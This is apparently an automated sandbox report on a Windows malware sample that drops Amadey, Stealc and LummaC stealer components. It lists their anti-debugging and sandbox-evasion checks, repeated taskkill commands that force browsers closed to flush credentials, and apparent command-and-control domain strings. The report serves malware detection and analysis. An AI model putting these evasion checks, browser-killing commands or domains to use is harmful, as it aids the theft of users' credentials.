Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_04E503D2 Start: 04E504ED End: 04E503BC 5_2_04E503D2
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Code function: 0_2_051A0DD8 rdtsc 0_2_051A0DD8
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B9EAA2 BlockInput, 6_2_00B9EAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00B52622
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B845C0 VirtualProtect ?,00000004,00000100,00000000 20_2_00B845C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00B242DE
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DD652B mov eax, dword ptr fs:[00000030h] 5_2_00DD652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DDA302 mov eax, dword ptr fs:[00000030h] 5_2_00DDA302
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B44CE8 mov eax, dword ptr fs:[00000030h] 6_2_00B44CE8
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B99750 mov eax, dword ptr fs:[00000030h] 20_2_00B99750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_00B80B62
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B52622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00B52622
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B4083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00B4083F
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B409D5 SetUnhandledExceptionFilter, 6_2_00B409D5
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B40C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00B40C21
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B9AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00B9AD48
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B9CEEA SetUnhandledExceptionFilter, 20_2_00B9CEEA
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B9B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_00B9B33A
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: num.exe PID: 2488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6516, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
Excessive usage of taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
LummaC encrypted strings found
Source: 9d7da53f74.exe String found in binary or memory: licendfilteo.site
Source: 9d7da53f74.exe String found in binary or memory: clearancek.site
Source: 9d7da53f74.exe String found in binary or memory: bathdoomgaz.stor
Source: 9d7da53f74.exe String found in binary or memory: spirittunek.stor
Source: 9d7da53f74.exe String found in binary or memory: dissapoiznw.stor
Source: 9d7da53f74.exe String found in binary or memory: studennotediw.stor
Source: 9d7da53f74.exe String found in binary or memory: mobbipenju.stor
Source: 9d7da53f74.exe String found in binary or memory: eaglepawnoy.stor
Searches for specific processes (likely to inject)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 20_2_00B99600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 20_2_00B99600
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B81201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 6_2_00B81201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B62BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00B62BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B8B226 SendInput,keybd_event, 6_2_00B8B226
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00BA22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 6_2_00BA22DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B80B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_00B80B62
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B81663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_00B81663
Source: 84d280a9e8.exe, 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp, 84d280a9e8.exe, 00000019.00000002.2952681186.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp, 84d280a9e8.exe, 0000004E.00000002.2952378189.0000000000BE2000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 84d280a9e8.exe Binary or memory string: Shell_TrayWnd
Source: skotes.exe Binary or memory string: AProgram Manager
Source: 8ObkdHP9Hq.exe, 00000000.00000002.1750930432.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1787198522.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: AProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DBD3E2 cpuid 5_2_00DBD3E2
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 20_2_00B97B90
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000336001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000336001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_00DBCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 5_2_00DBCBEA
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B7D27A GetUserNameW, 6_2_00B7D27A
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B5BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 6_2_00B5BB6F
Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe Code function: 6_2_00B242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00B242DE
Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.8ObkdHP9Hq.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1710668999.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1787122372.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2313808544.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1746151860.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1750861605.0000000000881000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 00000019.00000002.2953823488.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2951418045.0000000001088000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000004E.00000002.2953026392.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 84d280a9e8.exe PID: 7884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 84d280a9e8.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 84d280a9e8.exe PID: 5996, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 20.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.0.num.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.2430826993.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2442698783.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2630993454.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000000.2616219253.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2442182169.0000000000B81000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: num.exe PID: 2488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6516, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
OS version to string mapping found (often used in BOTs)
Source: 84d280a9e8.exe Binary or memory string: WIN_81
Source: 84d280a9e8.exe Binary or memory string: WIN_XP
Source: random[1].exe.5.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 